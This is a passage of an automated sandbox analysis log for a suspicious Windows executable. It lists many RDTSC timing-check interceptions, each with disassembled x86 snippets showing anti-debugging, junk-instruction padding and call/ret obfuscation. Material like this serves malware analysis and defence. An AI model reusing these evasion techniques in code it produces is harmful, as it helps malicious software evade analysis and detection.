edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E375FC second address: E37601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E37601 second address: E3760F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3760F second address: E37621 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB0E8BCBF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007FB0E8BCBF6Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3C258 second address: E3C261 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3AF73 second address: E3AF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 js 00007FB0E8BCBF84h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3AF88 second address: E3AF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3AF8C second address: E3AF96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3AF96 second address: E3AF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3B6C3 second address: E3B6C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3B6C7 second address: E3B6E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB0E8BCBD10h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007FB0E8BCBD08h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3B6E5 second address: E3B6EC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3B6EC second address: E3B6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3BC4B second address: E3BC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3BC50 second address: E3BC62 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jns 00007FB0E8BCBD06h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3C09E second address: E3C0B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBF75h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3C0B9 second address: E3C0BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3C0BD second address: E3C0C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3F528 second address: E3F52C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E43838 second address: E4383E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E4383E second address: E43842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E43842 second address: E43863 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DC6DEE second address: DC6E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FB0E8BCBD06h 0x0000000e jl 00007FB0E8BCBD06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E44091 second address: E440A5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB0E8BCBF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FB0E8BCBF66h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E441F9 second address: E44216 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB0E8BCBD12h 0x00000008 push ecx 0x00000009 jno 00007FB0E8BCBD06h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E443AF second address: E443B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E443B3 second address: E443BF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB0E8BCBD06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E44CB7 second address: E44CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E49538 second address: E49541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E49541 second address: E49554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0E8BCBF6Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E49554 second address: E49558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E49558 second address: E49561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E49561 second address: E49587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0E8BCBD14h 0x00000009 pop edx 0x0000000a popad 0x0000000b jng 00007FB0E8BCBD12h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E49869 second address: E4986D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E4986D second address: E49873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E49873 second address: E4989A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FB0E8BCBF66h 0x0000000e jmp 00007FB0E8BCBF79h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E4989A second address: E498AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FB0E8BCBD0Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E498AA second address: E498F2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB0E8BCBF7Ah 0x00000008 jmp 00007FB0E8BCBF74h 0x0000000d jnp 00007FB0E8BCBF68h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FB0E8BCBF78h 0x0000001e push eax 0x0000001f push edx 0x00000020 jng 00007FB0E8BCBF66h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E498F2 second address: E49900 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBD0Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E49900 second address: E49906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E49D1E second address: E49D2C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB0E8BCBD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E49D2C second address: E49D36 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB0E8BCBF66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E49D36 second address: E49D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB0E8BCBD17h 0x0000000b jng 00007FB0E8BCBD12h 0x00000011 popad 0x00000012 pushad 0x00000013 jg 00007FB0E8BCBD08h 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jo 00007FB0E8BCBD06h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E49D79 second address: E49D94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBF77h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E49D94 second address: E49D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E4A045 second address: E4A04B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5093F second address: E50977 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB0E8BCBD06h 0x00000008 jmp 00007FB0E8BCBD12h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FB0E8BCBD0Ch 0x00000014 popad 0x00000015 pushad 0x00000016 jnl 00007FB0E8BCBD08h 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E50977 second address: E50991 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBF71h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E02807 second address: DE7C92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pop ebx 0x0000000e nop 0x0000000f or ecx, dword ptr [ebp+122D3950h] 0x00000015 lea eax, dword ptr [ebp+12488540h] 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FB0E8BCBD08h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 jmp 00007FB0E8BCBD16h 0x0000003a push eax 0x0000003b jmp 00007FB0E8BCBD0Ch 0x00000040 mov dword ptr [esp], eax 0x00000043 push 00000000h 0x00000045 push esi 0x00000046 call 00007FB0E8BCBD08h 0x0000004b pop esi 0x0000004c mov dword ptr [esp+04h], esi 0x00000050 add dword ptr [esp+04h], 0000001Bh 0x00000058 inc esi 0x00000059 push esi 0x0000005a ret 0x0000005b pop esi 0x0000005c ret 0x0000005d xor dword ptr [ebp+122D1893h], esi 0x00000063 mov dword ptr [ebp+122D245Dh], ecx 0x00000069 or ecx, dword ptr [ebp+122D3A08h] 0x0000006f call dword ptr [ebp+122D2397h] 0x00000075 push eax 0x00000076 push edx 0x00000077 jp 00007FB0E8BCBD0Ch 0x0000007d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E02975 second address: E0297B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0297B second address: E02980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E02980 second address: E0298F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0E8BCBF6Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0298F second address: E029A6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB0E8BCBD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f je 00007FB0E8BCBD06h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E02C8B second address: E02C91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E02C91 second address: E02C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E02C95 second address: E02C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E02C99 second address: E02CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E02E98 second address: E02EA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBF6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E02EA8 second address: E02EAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E02FE2 second address: E02FE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E02FE6 second address: E02FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E030E2 second address: E030E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E030E9 second address: E03113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FB0E8BCBD15h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 je 00007FB0E8BCBD0Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E03215 second address: E0321B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0338F second address: E03393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E03393 second address: E0339D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0339D second address: E033A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E033A1 second address: E033AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E03B02 second address: E03B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E03B07 second address: E03B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FB0E8BCBF68h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1B8Fh], esi 0x00000028 lea eax, dword ptr [ebp+12488584h] 0x0000002e js 00007FB0E8BCBF66h 0x00000034 sbb ecx, 364823D8h 0x0000003a push eax 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e jnl 00007FB0E8BCBF66h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E03B50 second address: E03BB5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007FB0E8BCBD11h 0x00000013 mov dword ptr [ebp+122D1B95h], edi 0x00000019 pop ecx 0x0000001a lea eax, dword ptr [ebp+12488540h] 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007FB0E8BCBD08h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a jnl 00007FB0E8BCBD06h 0x00000040 nop 0x00000041 pushad 0x00000042 jnp 00007FB0E8BCBD0Ch 0x00000048 pushad 0x00000049 push edi 0x0000004a pop edi 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DE7C8E second address: DE7C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E4FBAC second address: E4FBC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB0E8BCBD0Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jno 00007FB0E8BCBD06h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E4FD17 second address: E4FD1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E4FE80 second address: E4FE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FB0E8BCBD06h 0x0000000f jne 00007FB0E8BCBD06h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E4FE95 second address: E4FE99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E4FE99 second address: E4FEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB0E8BCBD17h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E4FEB9 second address: E4FECC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB0E8BCBF6Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E4FECC second address: E4FED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E502EB second address: E502F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E502F0 second address: E50303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBD0Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E50303 second address: E50314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E50314 second address: E5031A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E5031A second address: E50324 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB0E8BCBF6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E50482 second address: E50494 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB0E8BCBD0Ch 0x00000008 jnl 00007FB0E8BCBD06h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E50494 second address: E50498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E560BF second address: E560C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E560C9 second address: E560D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB0E8BCBF66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E587F2 second address: E587FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FB0E8BCBD06h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E587FF second address: E5880A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
